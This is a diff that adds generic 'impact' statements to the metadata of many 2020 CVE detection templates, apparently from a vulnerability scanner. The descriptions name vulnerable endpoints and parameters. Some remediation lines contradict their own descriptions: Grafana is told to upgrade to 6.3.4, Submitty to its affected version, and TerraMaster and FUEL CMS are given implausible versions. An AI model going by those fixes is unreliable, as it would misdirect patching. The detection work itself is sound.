@@ -6,6 +6,8 @@ info: severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can bypass authentication and gain unauthorized access to sensitive information. remediation: | Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index e8b41142b1..c9c2c66c93 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin. reference: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index b6875bf25e..5ffb333c39 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site. remediation: | Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index a6b3d6c3c4..cb2bed59fc 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 3c838fa841..030e83565b 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index c15aba993a..b70875a437 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 89b1dd8a89..895bc23cad 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system. remediation: | Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 7c147fd267..3dad3219a3 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 4c7271634f..ab68265702 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: Upgrade to 6.3.4 or higher. reference: - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9 diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index db1237dbf3..6ab0c5a1b1 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 1f3dd04976..20b7c5a27d 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,3th1c_yuk1 severity: medium description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index c65a25f842..f5d3592f89 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values. + impact: | + An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials. remediation: | Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches. reference: diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 5af75f43af..0945e45f65 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center. reference: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index b151e7241b..1e2bd80335 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Airflow's Experimental API prior 1.10.11 allows all API requests without authentication. + impact: | + Allows unauthorized access to Airflow Experimental REST API remediation: | From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. reference: diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 4d89be4108..48682e91eb 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. + impact: | + An attacker can gain sensitive information from the exposed configuration file, potentially leading to further attacks. remediation: | Secure the configuration file by restricting access permissions and implementing proper access controls. reference: diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 2e073f4233..db7c3800c5 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml 
@@ -9,6 +9,8 @@ info: offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process. This vulnerability affects all versions of Apache Unomi prior to 1.5.2. + impact: | + Successful exploitation of this vulnerability can allow an attacker to execute arbitrary code on the affected server. remediation: Apache Unomi users should upgrade to 1.5.2 or later. reference: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 573b402eb2..0fe0b85d9a 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. + impact: | + The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions. remediation: | Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 309fc4e226..ebb7c7cad3 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 5104f23a7f..7f4a742561 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides." + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Fixed in version 1.16.7. reference: - https://dl.gitea.io/gitea/1.16.6 diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index fd516899d0..deb7504203 100644 --- a/http/cves/2020/CVE-2020-14179.yaml 
+++ b/http/cves/2020/CVE-2020-14179.yaml @@ -5,6 +5,8 @@ info: author: x1m_martijn severity: medium description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 7b10964739..fc6ebd2ad7 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -5,6 +5,8 @@ info: author: bjhulst severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 1ca2d335d1..4196bb5959 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml 
@@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 0dad2fc4c5..0a3676c129 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index d816692ac2..03e2efaee6 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index ac6913782f..1a8fd7cb4f 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -5,6 +5,8 @@ info: author: Ivo Palazzolo (@palaziv) severity: high description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage." + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Apply the latest security patches and updates provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 1bf1e299b8..fa5fc548a5 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application. remediation: | Apply the latest security patches provided by Oracle to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 814bba4b47..1a67d6ec47 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 29c3fdd32d..2d0216088f 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 6a8807160c..656b73bc0b 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can manipulate the redirect URL and trick users into visiting malicious websites. remediation: | Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik. reference: diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 7081184174..47466bc297 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 523af36581..b8c0612c56 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -5,6 +5,8 @@ info: author: becivells severity: critical description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index d65405b195..75f6bdf57b 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml 
@@ -5,6 +5,8 @@ info: author: Akash.C severity: medium description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 40b56112a3..369c284914 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -9,6 +9,8 @@ info: author: dwisiswant0 severity: critical description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the MobileIron infrastructure. remediation: | Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively reference: diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 1ec5541c20..4a08fb4c94 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index bb876fa7dd..5ab7d10c14 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later). reference: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 9c81fb4583..ff2e0ccf4d 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index a2e50b0914..99c2b4af10 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index a536e8c9ad..4ba2f6eb63 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. + impact: | + An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users. remediation: | Apply the latest firmware update provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 74abe037fc..1b8f8e2775 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to a complete compromise of the SharePoint server. remediation: | Apply the latest security updates provided by Microsoft to address this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 265447c295..a21d9138f2 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4bf0b83c61..c755de2719 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 48ffd08882..227c12c79e 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml 
@@ -5,6 +5,8 @@ info: author: gy741,edoardottt severity: critical description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 823130a149..0cd3fe4307 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 115 reference: - https://www.exploit-db.com/exploits/48741 diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 32401aaa7b..19764efa32 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: 